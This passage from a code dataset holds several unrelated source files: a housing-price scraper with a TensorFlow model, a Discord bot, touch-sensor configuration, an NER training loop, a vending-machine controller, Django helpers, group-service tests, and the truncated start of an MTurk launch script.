' | 2室1厅 | 79平米 | 南 | 精装'\n houseInfo = info.xpath('div[@class=\"address\"]/div[@class=\"houseInfo\"]/text()')[0]\n positionInfo = info.xpath('div[@class=\"flood\"]/div[@class=\"positionInfo\"]/text()')[0]\n price = info.xpath('div[@class=\"priceInfo\"]/div[@class=\"totalPrice\"]/span/text()')[0]\n\n room_info = re.search(r'(\\d)室(\\d)厅', houseInfo)\n decorate = re.search(r'(精装|毛坯|简装)', houseInfo)\n area = re.search(r'(\\d+(?:.\\d+)*)平米', houseInfo)\n floor = re.search(r'(低|中|高)楼层', positionInfo)\n\n if not (room_info and room_info and decorate and area and floor):\n continue\n\n rooms = room_info.group(1)\n halls = room_info.group(2)\n decorate = {\"毛坯\": 0, \"简装\": 1, \"精装\": 2}[decorate.group(1)]\n area = area.group(1)\n floor = {\"低\": 0, \"中\": 1, \"高\": 2}[floor.group(1)]\n\n data.append([rooms, halls, decorate, area, floor, price])\n\n # 写入csv文件\n with open(output_path, \"w\", encoding='utf-8', newline='') as f:\n writer = csv.writer(f)\n # 写入列的名称\n writer.writerow([\"房间数\", \"客厅数\", \"装修(毛坯:0,简装:1,精装:2)\", \"面积\", \"楼层(低:0,中:1,高:2)\", \"总价\"])\n # 写入内容\n writer.writerows(data)\n\n\nsounth_urls = (\"https://cd.lianjia.com/ershoufang/c3011056655752/\",\n \"https://cd.lianjia.com/ershoufang/pg2c3011056655752/\",\n \"https://cd.lianjia.com/ershoufang/pg3c3011056655752/\",\n \"https://cd.lianjia.com/ershoufang/pg4c3011056655752/\")\nnorth_urls = (\"https://cd.lianjia.com/ershoufang/c3011056658392/\",\n \"https://cd.lianjia.com/ershoufang/pg2c3011056658392/\")\n\nget_house_info(sounth_urls, 'C:\\project\\python\\南区.csv')\nget_house_info(north_urls, 'C:\\project\\python\\北区.csv')\ndata = pd.read_csv('C:\\project\\python\\南区.csv')\ndata_test = pd.read_csv('C:\\project\\python\\北区.csv')\nplt.scatter(data['面积'], data['总价'])\nplt.show()\nx = data['面积']\ny = data['总价']\nmodel = tf.keras.Sequential()\nmodel.add(tf.keras.layers.Dense(1, input_shape=(1,)))\nmodel.summary()\nmodel.compile(optimizer='adam', loss='mse')\nhistory = model.fit(x, y, epochs=10000)\nmodel.predict(data_test.iloc[:10, -3])\nplt.plot(data['面积'], data['总价'], 'bo',\n data['面积'], model.predict(data.iloc[:, -3]), 'ro')\nplt.show()\nplt.plot(data_test['面积'], data_test['总价'], 'bo',\n data_test['面积'], model.predict(data_test.iloc[:, -3]), 'ro')\nplt.show()\n\n#\nx2 = data.iloc[:, 2:-1]\ny2 = data.iloc[:, -1]\n\nmodel2 = tf.keras.Sequential([\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(30, input_shape=(3,), activation='relu'),\n tf.keras.layers.Dense(1)])\nmodel2.summary()\nmodel2.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),\n loss='mse')\nhistory2 = model2.fit(x2, y2, epochs=10000)\nmodel2.predict(data_test.iloc[:10, 2:-1])\nplt.plot(data['面积'], data['总价'], 'bo',\n data['面积'], model2.predict(data.iloc[:, 2:-1]), 'ro')\nplt.show()\nplt.plot(data_test['面积'], data_test['总价'], 'bo',\n data_test['面积'], model2.predict(data_test.iloc[:, 2:-1]), 'ro')\nplt.show()\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":4171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"581656930","text":"import discord\r\nimport os\r\nimport json\r\nimport random\r\nimport STATICS\r\nfrom discord import Game, Embed\r\nfrom commands import cmd_kiss, cmd_cuddle, cmd_help\r\n\r\n\r\nclient = discord.Client()\r\n\r\n\r\ncommands = {\r\n\r\n\t\"kiss\": cmd_kiss,\r\n\t\"cuddle\": cmd_cuddle,\r\n\t\"help\": cmd_help,\r\n\r\n}\r\n\r\n\r\n@client.event\r\nasync def on_ready():\r\n\tprint(\"Bot is ready!\")\r\n\tprint(\"Logged in as\")\r\n\tprint(client.user.name)\r\n\tprint(\"with a UserID of\")\r\n\tprint(client.user.id)\r\n\tawait client.change_presence(game=discord.Game(name=\"Making Coffee! x3 (ck!)\"))\r\n\r\n\t\r\n\t\r\n@client.event\r\nasync def on_message(message):\r\n if message.content.startswith(STATICS.PREFIX):\r\n invoke = message.content[len(STATICS.PREFIX):].split(\" \")[0]\r\n args = message.content.split(\" \")[1:]\r\n if commands.__contains__(invoke):\r\n await commands.get(invoke).ex(args, message, client, invoke)\r\n else:\r\n await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.red(), description=(\"The command `%s` is not valid!\" % invoke)))\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n\tif message.content.startswith(\"ck!headpat\"):\r\n\t\tawait client.send_message(message.channel, random.choice([\"Oh...\", \"Aww..\", \"I l-love it...\", \"P-Please continue doing that.\", \"T-Thanks.. It feels great...\"]))\r\n\telif message.content.startswith(\"abc\"):\r\n\t\tawait client.send_message(message.channel, \"def\")\r\n\telif message.content.startswith(\"ck!ask\"):\r\n\t\tawait client.send_message(message.channel, random.choice([\"Uh.. I t-think that would be a yes.\", \"I-I agree with that..\", \"Oh.. M-My answer would be a maybe. I-I'm not too sure..\", \"I-I approve with it..\", \"Y-Yes..\", \"I d-don't approve of it..\", \"No.. T-That's a no.\", \"N-No..\", \"I-I don't think so..\", \"My answer is a no..\"]))\r\n\telif message.content.startswith(\"ck!chino\"):\r\n\t\tawait client.send_file(message.channel, random.choice([\"pictures/chino1, pictures/chino2\"]))\r\nclient.run(str(os.environ.get(\"BOT_TOKEN\")))\r\n","sub_path":"Chino.py","file_name":"Chino.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"315563769","text":"############################################################################\n#### Code Generation ####\n############################################################################\nif (getDeviceName.getDefaultValue() in [\"SAME51\",\"SAME53\",\"SAME54\",\"SAMD51\"]):\n # Library File\n touchLibraryFile = qtouchComponent.createLibrarySymbol(\"TOUCH_KEY_LIB\", None)\n touchLibraryFile.setSourcePath(\"/src/libraries/0x0002_qtm_touch_key_cm4.X.a\")\n touchLibraryFile.setOutputName(\"0x0002_qtm_touch_key_cm4.X.a\")\n touchLibraryFile.setDestPath(\"/touch/lib/\")\n touchLibraryFile.setEnabled(True)\nelse:\n # Library File\n touchLibraryFile = qtouchComponent.createLibrarySymbol(\"TOUCH_KEY_LIB\", None)\n touchLibraryFile.setSourcePath(\"/src/libraries/0x0002_qtm_touch_key_cm0p.X.a\")\n touchLibraryFile.setOutputName(\"0x0002_qtm_touch_key_cm0p.X.a\")\n touchLibraryFile.setDestPath(\"/touch/lib/\")\n touchLibraryFile.setEnabled(True)\n\n# Header File\ntouchHeaderFile = qtouchComponent.createFileSymbol(\"TOUCH_KEY_HEADER\", None)\ntouchHeaderFile.setSourcePath(\"/src/qtm_touch_key_0x0002_api.h\")\ntouchHeaderFile.setOutputName(\"qtm_touch_key_0x0002_api.h\")\ntouchHeaderFile.setDestPath(\"/touch/\")\ntouchHeaderFile.setProjectPath(\"config/\" + configName + \"/touch/\")\ntouchHeaderFile.setType(\"HEADER\")\ntouchHeaderFile.setMarkup(False)\n\n################################################################################\n#### Global Variables ####\n################################################################################\ntouchKeyCountMax = touchChannelCountMax\n################################################################################\n#### Component ####\n################################################################################\nkeyMenu = qtouchComponent.createMenuSymbol(\"KEY_MENU\", touchMenu)\nkeyMenu.setLabel(\"Key Configuration\")\nkeyMenu.setDescription(\"Configure Keys\")\n\n# Touch Channel Enable Count\ntouchKeyNumChannel = qtouchComponent.createIntegerSymbol(\"TOUCH_KEY_ENABLE_CNT\", keyMenu)\ntouchKeyNumChannel.setLabel(\"Number of keys to enable\")\ntouchKeyNumChannel.setDefaultValue(0)\ntouchKeyNumChannel.setMin(0)\ntouchKeyNumChannel.setMax(touchKeyCountMax)\n\nfor channelID in range(0, touchKeyCountMax):\n\n touchKeyEnable = qtouchComponent.createBooleanSymbol(\"TOUCH_ENABLE_KEY_\" + str(channelID), keyMenu)\n touchKeyEnable.setLabel(\"Use touch channel \" + str(channelID))\n touchKeyEnable.setDefaultValue(False)\n\n #Sensor Detect Threshold\n touchSym_SENSOR_DET_THRESHOLD_Val = qtouchComponent.createIntegerSymbol(\"DEF_SENSOR_DET_THRESHOLD\" + str(channelID), touchKeyEnable)\n touchSym_SENSOR_DET_THRESHOLD_Val.setLabel(\"Sensor Detect Threshold\")\n touchSym_SENSOR_DET_THRESHOLD_Val.setDefaultValue(20)\n touchSym_SENSOR_DET_THRESHOLD_Val.setMin(0)\n touchSym_SENSOR_DET_THRESHOLD_Val.setMax(255)\n touchSym_SENSOR_DET_THRESHOLD_Val.setDescription(\"Configure the sensor's detect threshold. When finger touches sensor, the touch delta increases.Sensor will be reported as touched only if the sensor's touch delta value is more than Sensor Threshold.It is recommended to configure Sensor Threshold as 50~70% of touch delta. User can start with default value and can configure after monitoring touch delta value.\")\n \n #Sensor Hysteresis\n touchSym_SENSOR_HYST_Val = qtouchComponent.createKeyValueSetSymbol(\"DEF_SENSOR_HYST\" + str(channelID), touchKeyEnable)\n touchSym_SENSOR_HYST_Val.setLabel(\"Sensor Hysteresis\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST50\", \"HYST_50\", \"50 %\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST25\", \"HYST_25\", \"25 %\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST125\", \"HYST_12_5\", \"12.5 %\")\n touchSym_SENSOR_HYST_Val.addKey(\"HYST625\", \"HYST_6_25\", \"6.25 %\")\n touchSym_SENSOR_HYST_Val.setDefaultValue(1)\n touchSym_SENSOR_HYST_Val.setOutputMode(\"Value\")\n touchSym_SENSOR_HYST_Val.setDisplayMode(\"Description\")\n touchSym_SENSOR_HYST_Val.setDescription(\"Under noisy conditions, the delta value goes up/down over the sensor threshold.During these conditions, the sensor dither in and out of touch.To avoid this, once a sensor goes into detect state, the threshold for the sensor is reduced (by the hysteresis value).Hysteresis values are derived from Sensor Threshold value.\")\n \n #Sensor AKS Setting\n touchSym_NOD_AKS_Val = qtouchComponent.createKeyValueSetSymbol(\"DEF_NOD_AKS\" + str(channelID), touchKeyEnable)\n touchSym_NOD_AKS_Val.setLabel(\"Sensor AKS\")\n touchSym_NOD_AKS_Val.addKey(\"AKS0\", \"NO_AKS_GROUP\", \"No AKS\")\n touchSym_NOD_AKS_Val.addKey(\"AKS1\", \"AKS_GROUP_1\", \"AKS Group 1\")\n touchSym_NOD_AKS_Val.addKey(\"AKS2\", \"AKS_GROUP_2\", \"AKS Group 2\")\n touchSym_NOD_AKS_Val.addKey(\"AKS3\", \"AKS_GROUP_3\", \"AKS Group 3\")\n touchSym_NOD_AKS_Val.addKey(\"AKS4\", \"AKS_GROUP_4\", \"AKS Group 4\")\n touchSym_NOD_AKS_Val.addKey(\"AKS5\", \"AKS_GROUP_5\", \"AKS Group 5\")\n touchSym_NOD_AKS_Val.addKey(\"AKS6\", \"AKS_GROUP_6\", \"AKS Group 6\")\n touchSym_NOD_AKS_Val.addKey(\"AKS7\", \"AKS_GROUP_7\", \"AKS Group 7\")\n touchSym_NOD_AKS_Val.setDefaultValue(0)\n touchSym_NOD_AKS_Val.setOutputMode(\"Value\")\n touchSym_NOD_AKS_Val.setDisplayMode(\"Description\")\n touchSym_NOD_AKS_Val.setDescription(\"Configures the Adjacent Keys Suppression (AKS).AKS can be used when touching multiple sensors are not allowed in a system or When sensors are physically closer to each other. When sensors are closer to each other, there is a possibility that touching one sensor causes rise in touch delta value on other adjacent sensors. At times the delta raise in other sensors may cross threshold and could report false detection.When such sensors are configured in same AKS group, only the first sensor (which goes in to detect) will be reported as touched.All other sensor's state will be suppressed even if their delta crosses Sensor Threshold.Default: AKS is not used.\")\n\n\n\n","sub_path":"config/key.py","file_name":"key.py","file_ext":"py","file_size_in_byte":5854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"338175092","text":"#!/usr/bin/env python\nimport numpy as np\nimport pickle\nimport random\nfrom random import shuffle\nfrom training.util import adjust_learning_rate, clip_model_grad, create_opt, load_dynamic_config\nfrom util.evaluate import evaluate, count_overlap, evaluate_detail\nfrom model.SemiMention import SemiMention\nfrom config import config\nfrom torch.autograd import Variable\nimport torch\nimport copy\nimport time\nimport pdb\n\n# load data\nf = open(config.data_path + \"_train.pkl\", 'rb')\ntrain_token_batches, train_char_batch, train_char_len_batch, train_pos_batches, train_label_batches = pickle.load(f)\nf.close()\nf = open(config.data_path + \"_dev.pkl\", 'rb')\ndev_token_batches, dev_char_batch, dev_char_len_batch, dev_pos_batches, dev_label_batches = pickle.load(f)\nf.close()\nf = open(config.data_path + \"_test.pkl\", 'rb')\ntest_token_batches, test_char_batch, test_char_len_batch, test_pos_batches, test_label_batches = pickle.load(f)\nf.close()\n\n# misc info \n# TODO: get it better\nmisc_config = pickle.load(open(config.data_path + \"_config.pkl\", 'rb'))\nload_dynamic_config(misc_config, config)\nid2label = misc_config[\"id2label\"]\n\nner_model = SemiMention(config)\nif config.pre_trained:\n ner_model.load_vector()\nif config.if_gpu and torch.cuda.is_available(): ner_model = ner_model.cuda()\n\nparameters = filter(lambda p: p.requires_grad, ner_model.parameters())\noptimizer = create_opt(parameters, config)\n\nprint(\"{0} batches expected for training\".format(len(train_token_batches)))\nbest_model = None\nbest_per = 0\ntrain_all_batches = list(zip(train_token_batches, train_char_batch, train_char_len_batch, train_pos_batches, train_label_batches))\nif config.if_shuffle:\n shuffle(train_all_batches)\n\n\ndef get_f1(model, mode):\n pred_all, pred, recall_all, recall = 0, 0, 0, 0\n f_pred_all, f_pred, f_recall_all, f_recall = 0, 0, 0, 0\n gold_cross_num = 0\n pred_cross_num = 0\n if mode == \"dev\":\n batch_zip = zip(dev_token_batches, dev_char_batch, dev_char_len_batch, dev_pos_batches, dev_label_batches)\n elif mode == \"test\":\n batch_zip = zip(test_token_batches, test_char_batch, test_char_len_batch, test_pos_batches, test_label_batches)\n else:\n raise ValueError\n\n for token_batch, char_batch, char_len_batch, pos_batch, label_batch in batch_zip:\n token_batch_var = Variable(torch.LongTensor(np.array(token_batch)))\n pos_batch_var = Variable(torch.LongTensor(np.array(pos_batch)))\n if config.if_gpu:\n token_batch_var = token_batch_var.cuda()\n pos_batch_var = pos_batch_var.cuda()\n\n model.eval()\n pred_entities = model.predict(token_batch_var, pos_batch_var)\n p_a, p, r_a, r = evaluate(label_batch, pred_entities)\n\n #gold_cross_num += sum(count_overlap(label_batch))\n #pred_cross_num += sum(count_overlap(pred_entities))\n gold_cross_num += 0\n pred_cross_num += 0\n\n pred_all += p_a\n pred += p\n recall_all += r_a\n recall += r\n\n\n print(pred_all, pred, recall_all, recall)\n p = pred / pred_all if pred_all else 0\n r = recall / recall_all if recall_all else 0\n f1 = 2 * p * r / (p + r) if p + r else 0\n # f1 = 2 / ((pred_all / pred) + (recall_all / recall))\n print( \"Precision {0}, Recall {1}, F1 {2}\".format(pred / pred_all, recall / recall_all, f1) )\n # print(\"Prediction Crossing: \", pred_cross_num)\n # print(\"Gold Crossing: \", gold_cross_num)\n\n return f1\n\n# Test\n# f1 = get_f1(ner_model, \"dev\")\n\ntrain_start_time = time.time()\nearly_counter = 0\ndecay_counter = 0\nfor e_ in range(config.epoch):\n print(\"Epoch: \", e_ + 1)\n batch_counter = 0\n for token_batch, char_batch, char_len_batch, pos_batch, label_batch in train_all_batches:\n batch_len = len(token_batch)\n sent_len = len(token_batch[0])\n\n token_batch_var = Variable(torch.LongTensor(np.array(token_batch)))\n pos_batch_var = Variable(torch.LongTensor(np.array(pos_batch)))\n if config.if_gpu:\n token_batch_var = token_batch_var.cuda()\n pos_batch_var = pos_batch_var.cuda()\n\n ner_model.train()\n optimizer.zero_grad()\n loss = ner_model.forward(token_batch_var, pos_batch_var, label_batch)\n loss.backward()\n clip_model_grad(ner_model, config.clip_norm)\n if batch_counter % config.print_per_epoch == 0:\n print(\"batch {0} with {1} instance and sentece length {2} loss {3}\".format(\n batch_counter, batch_len, sent_len, loss.cpu().data.numpy()[0]))\n batch_counter += 1\n\n optimizer.step()\n\n if (e_+1) % config.check_every != 0:\n continue\n\n # evaluating dev and always save the best\n cur_time = time.time()\n f1 = get_f1(ner_model, \"dev\")\n print(\"Dev step took {} seconds\".format(time.time() - cur_time))\n\n # early stop\n if f1 > best_per:\n early_counter = 0\n best_per = f1\n del best_model\n best_model = copy.deepcopy(ner_model)\n else:\n early_counter += 1\n if early_counter > config.lr_patience:\n decay_counter += 1\n early_counter = 0\n if decay_counter > config.decay_patience:\n break\n else:\n adjust_learning_rate(optimizer)\nprint(\"\")\nprint(\"Training step took {} seconds\".format(time.time() - train_start_time))\nprint(\"Best dev acc {0}\".format(best_per))\nprint(\"\")\n\n# remember to eval after loading the model. for the reason of batchnorm and dropout\ncur_time = time.time()\nprint(\"Metric on test dataset of best model:\")\nf1 = get_f1(best_model, \"test\")\nprint(\"Test step took {} seconds\".format(time.time() - cur_time))\n\nserial_number = str(random.randint(0,248))\nthis_model_path = config.model_path + \"_\" + serial_number\nprint(\"Dumping model to {0}\".format(this_model_path))\ntorch.save(best_model.state_dict(), this_model_path)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"573635894","text":"from parser import Parser\nimport queue\nimport time\nimport math\nimport os\nimport socket\nfrom gui.client import Client\nfrom gui.guilistener import GuiListener\nfrom coffe_machine import PiHatListener\nfrom config import DRINK_IDS\nfrom config import DRINK_UUIDS\n\nif __name__ == \"__main__\":\n start_time = 0\n\n dataQueue = queue.PriorityQueue()\n listener = GuiListener(port = 65448, dataQueue = dataQueue)\n listener.setDaemon(True)\n listener.start()\n\n while True:\n try:\n c = Client('127.0.0.1', 65449)\n break\n except:\n pass\n print('Connecting')\n time.sleep(1)\n\n\n parser = Parser(dataQueue = dataQueue)\n parser.setDaemon(True)\n parser.start()\n\n\n ph1 = PiHatListener(dataQueue = dataQueue)\n ph1.setDaemon(True)\n ph1.start()\n ph1.subscribeToVMC()\n\n waiting_transaction = False\n current_address = 2020202\n \n while True:\n msg = dataQueue.get().data\n\n if 'subscribed' in msg.keys():\n if msg['subscribed'] == True:\n c.sendMessage('mainScreen')\n ph1.subscribed = True\n\n\n if 'UUID' in msg.keys() and parser.empty == False:\n choice = None\n for k,v in DRINK_UUIDS.items():\n tmp = v.replace('-', '').upper()\n print(tmp, msg['UUID']['uuid'])\n if tmp == msg['UUID']['uuid'].replace(' ', ''):\n choice = k\n ph1.startVending()\n time.sleep(1)\n ph1.selectBeverage(choice)\n\n \n if 'gui' in msg.keys():\n if msg['gui'] == 'startVend':\n c.sendMessage('syncScreen')\n\n if 'id' in msg.keys():\n choice = None\n for k, v in DRINK_IDS.items():\n print(v, msg['id'])\n if k == msg['id']:\n choice = k\n amount = v\n print(choice)\n current_address = str(current_address)\n c.sendMessage('paymentScreen-' + current_address + '-' + str(amount) + '-' + choice)\n start_time = time.time()\n waiting_transaction = True\n\n if 'paid' in msg.keys():\n if msg['paid'] == True: \n c.sendMessage('finalScreen')\n ph1.subscribeToVMC()\n time.sleep(3)\n waiting_transaction = False\n start_time = 0\n parser.empty = True\n\n time.sleep(1)\n","sub_path":"ibeacon_project/tmp_vend.py","file_name":"tmp_vend.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"326177733","text":"import gbe.models as conf\nfrom django.http import Http404\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.models import User, Group\nfrom django.conf import settings\n\ndef validate_profile(request, require=False):\n '''\n Return the user profile if any\n '''\n if request.user.is_authenticated():\n try:\n return request.user.profile\n except conf.Profile.DoesNotExist:\n if require:\n raise Http404\n else:\n return None\n\n\ndef validate_perms(request, perms, require = True):\n '''\n Validate that the requesting user has the stated permissions\n Returns profile object if perms exist, False if not\n '''\n profile = validate_profile(request, require = False)\n if not profile:\n if require:\n raise Http404\n else:\n return False\n if any([perm in profile.privilege_groups for perm in perms]):\n return profile\n if require: # error out if permission is required\n raise Http404\n return False # or just return false if we're just checking\n\n\n'''\n Sends mail to a privilege group, designed for use by bid functions\n Will always send using default_from_email \n'''\ndef mail_to_group(subject, message, group_name):\n to_list = [user.email for user in User.objects.filter(groups__name=group_name)]\n send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to_list)\n return None\n","sub_path":"expo/gbe/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"83756394","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nimport mock\nimport pytest\n\nfrom h.models import Group, GroupScope\nfrom h.models.group import JoinableBy, ReadableBy, WriteableBy\nfrom h.services.group import GroupService\nfrom h.services.group import groups_factory\n\nfrom tests.common.matchers import Matcher\n\n\nclass TestGroupService(object):\n def test_create_private_group_returns_group(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert isinstance(group, Group)\n\n def test_create_private_group_sets_group_name(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.name == 'Anteater fans'\n\n def test_create_private_group_sets_group_authority(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.authority == 'example.com'\n\n def test_create_private_group_sets_group_creator(self, service, users):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.creator == users['cazimir']\n\n def test_create_private_group_sets_description_when_present(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir', 'all about ant eaters')\n\n assert group.description == 'all about ant eaters'\n\n def test_create_private_group_skips_setting_description_when_missing(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.description is None\n\n def test_create_private_group_adds_group_creator_to_members(self, service, users):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert users['cazimir'] in group.members\n\n @pytest.mark.parametrize('flag,expected_value', [\n ('joinable_by', JoinableBy.authority),\n ('readable_by', ReadableBy.members),\n ('writeable_by', WriteableBy.members)])\n def test_create_private_group_sets_access_flags(self, service, flag, expected_value):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert getattr(group, flag) == expected_value\n\n def test_create_private_group_adds_group_to_session(self, db_session, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group in db_session\n\n def test_create_private_group_sets_group_ids(self, service):\n group = service.create_private_group('Anteater fans', 'cazimir')\n\n assert group.id\n assert group.pubid\n\n def test_create_private_group_publishes_join_event(self, service, publish):\n group = service.create_private_group('Dishwasher disassemblers', 'theresa')\n\n publish.assert_called_once_with('group-join', group.pubid, 'acct:theresa@example.com')\n\n def test_create_open_group_returns_group(self, service, users):\n creator = users['cazimir']\n\n group = service.create_open_group(name='test_group',\n userid=creator.username,\n origins=['https://biopub.org'],\n description='test_description')\n\n assert group.name == 'test_group'\n assert group.authority == 'example.com'\n assert group.creator == creator\n assert group.description == 'test_description'\n assert group.joinable_by is None\n assert group.readable_by == ReadableBy.world\n assert group.writeable_by == WriteableBy.authority\n\n def test_create_open_group_sets_scopes(self, service, matchers, users):\n origins = ['https://biopub.org', 'http://example.com', 'https://wikipedia.com']\n\n group = service.create_open_group(name='test_group',\n userid=users['cazimir'].username,\n origins=origins,\n description='test_description')\n\n assert group.scopes == matchers.unordered_list([\n GroupScopeWithOrigin(h) for h in origins])\n\n def test_create_open_group_always_creates_new_scopes(self, db_session, factories, service, users, matchers):\n # It always creates a new scope, even if a scope with the given origin\n # already exists (this is because a single scope can only belong to\n # one group, so the existing scope can't be reused with the new group).\n origins = ['https://biopub.org', 'http://example.com']\n scopes = [factories.GroupScope(origin=h) for h in origins]\n\n group = service.create_open_group(name='test_group',\n userid=users['cazimir'].username,\n origins=origins,\n description='test_description')\n\n # It should reuse the GroupScopes already in the DB, not try to create\n # new ones.\n for scope in scopes:\n assert scope not in group.scopes\n\n def test_create_open_group_description_defaults_to_None(self, service):\n # Create a group with no `description` argument.\n group = service.create_open_group(name='test_group',\n userid='cazimir',\n origins=['https://biopub.org'])\n\n assert group.description is None\n\n def test_member_join_adds_user_to_group(self, service, group, users):\n service.member_join(group, 'theresa')\n\n assert users['theresa'] in group.members\n\n def test_member_join_is_idempotent(self, service, group, users):\n service.member_join(group, 'theresa')\n service.member_join(group, 'theresa')\n\n assert group.members.count(users['theresa']) == 1\n\n def test_member_join_publishes_join_event(self, service, publish, group):\n group.pubid = 'abc123'\n\n service.member_join(group, 'theresa')\n\n publish.assert_called_once_with('group-join', 'abc123', 'theresa')\n\n def test_member_leave_removes_user_from_group(self, service, users):\n group = Group(name='Theresa and her buddies',\n authority='foobar.com',\n creator=users['theresa'])\n group.members.append(users['cazimir'])\n\n service.member_leave(group, 'cazimir')\n\n assert users['cazimir'] not in group.members\n\n def test_member_leave_is_idempotent(self, service, users):\n group = Group(name='Theresa and her buddies',\n authority='foobar.com',\n creator=users['theresa'])\n group.members.append(users['cazimir'])\n\n service.member_leave(group, 'cazimir')\n service.member_leave(group, 'cazimir')\n\n assert users['cazimir'] not in group.members\n\n def test_member_leave_publishes_leave_event(self, service, users, publish):\n group = Group(name='Donkey Trust',\n authority='foobari.com',\n creator=users['theresa'])\n group.members.append(users['cazimir'])\n group.pubid = 'abc123'\n\n service.member_leave(group, 'cazimir')\n\n publish.assert_called_once_with('group-leave', 'abc123', 'cazimir')\n\n @pytest.mark.parametrize('with_user', [True, False])\n def test_groupids_readable_by_includes_world(self, with_user, service, db_session, factories):\n user = None\n if with_user:\n user = factories.User()\n db_session.flush()\n\n assert '__world__' in service.groupids_readable_by(user)\n\n @pytest.mark.parametrize('with_user', [True, False])\n def test_groupids_readable_by_includes_world_readable_groups(self, with_user, service, db_session, factories):\n # group readable by members\n factories.Group(readable_by=ReadableBy.members)\n # group readable by everyone\n group = factories.Group(readable_by=ReadableBy.world)\n\n user = None\n if with_user:\n user = factories.User()\n db_session.flush()\n\n assert group.pubid in service.groupids_readable_by(user)\n\n def test_groupids_readable_by_includes_memberships(self, service, db_session, factories):\n user = factories.User()\n\n group = factories.Group(readable_by=ReadableBy.members)\n group.members.append(user)\n\n db_session.flush()\n\n assert group.pubid in service.groupids_readable_by(user)\n\n def test_groupids_created_by_includes_created_groups(self, service, factories):\n user = factories.User()\n group = factories.Group(creator=user)\n\n assert group.pubid in service.groupids_created_by(user)\n\n def test_groupids_created_by_excludes_other_groups(self, service, db_session, factories):\n user = factories.User()\n private_group = factories.Group()\n private_group.members.append(user)\n factories.Group(readable_by=ReadableBy.world)\n db_session.flush()\n\n assert service.groupids_created_by(user) == []\n\n def test_groupids_created_by_returns_empty_list_for_missing_user(self, service):\n assert service.groupids_created_by(None) == []\n\n @pytest.fixture\n def group(self, users):\n return Group(name='Donkey Trust',\n authority='foobar.com',\n creator=users['cazimir'])\n\n @pytest.fixture\n def publish(self):\n return mock.Mock(spec_set=[])\n\n @pytest.fixture\n def service(self, db_session, users, publish):\n return GroupService(db_session, users.get, publish=publish)\n\n\n@pytest.mark.usefixtures('user_service')\nclass TestGroupsFactory(object):\n def test_returns_groups_service(self, pyramid_request):\n svc = groups_factory(None, pyramid_request)\n\n assert isinstance(svc, GroupService)\n\n def test_provides_request_db_as_session(self, pyramid_request):\n svc = groups_factory(None, pyramid_request)\n\n assert svc.session == pyramid_request.db\n\n def test_wraps_user_service_as_user_fetcher(self, pyramid_request, user_service):\n svc = groups_factory(None, pyramid_request)\n\n svc.user_fetcher('foo')\n\n user_service.fetch.assert_called_once_with('foo')\n\n def test_provides_realtime_publisher_as_publish(self, patch, pyramid_request):\n pyramid_request.realtime = mock.Mock(spec_set=['publish_user'])\n session = patch('h.services.group.session')\n svc = groups_factory(None, pyramid_request)\n\n svc.publish('group-join', 'abc123', 'theresa')\n\n session.model.assert_called_once_with(pyramid_request)\n pyramid_request.realtime.publish_user.assert_called_once_with({\n 'type': 'group-join',\n 'session_model': session.model.return_value,\n 'userid': 'theresa',\n 'group': 'abc123',\n })\n\n\nclass GroupScopeWithOrigin(Matcher):\n \"\"\"Matches any GroupScope with the given origin.\"\"\"\n\n def __init__(self, origin):\n self.origin = origin\n\n def __eq__(self, group_scope):\n if not isinstance(group_scope, GroupScope):\n return False\n return group_scope.origin == self.origin\n\n\n@pytest.fixture\ndef user_service(pyramid_config):\n service = mock.Mock(spec_set=['fetch'])\n service.fetch.return_value = None\n pyramid_config.register_service(service, name='user')\n return service\n\n\n@pytest.fixture\ndef users(factories):\n return {\n 'cazimir': factories.User(username='cazimir'),\n 'theresa': factories.User(username='theresa'),\n }\n","sub_path":"tests/h/services/group_test.py","file_name":"group_test.py","file_ext":"py","file_size_in_byte":11488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"565452842","text":"import boto3\nimport os\nimport random\nfrom launch_init import *\n\n\n\n# Opening connection to the Mturk server\nkeys = []\nwith open(file=key_location, mode='r') as key_file:\n\tkeys = key_file.read().splitlines()\n\n\nmturk = boto3.client('mturk',\n aws_access_key_id = keys[0],\n aws_secret_access_key = keys[1],\n region_name='us-east-1',\n endpoint_url = MTURK_SANDBOX\n)\n\n# Taking the basic xml template and inserting the vega (or vega lite) code\nspecs = []\nwith open(file=xml_location, mode='r') as 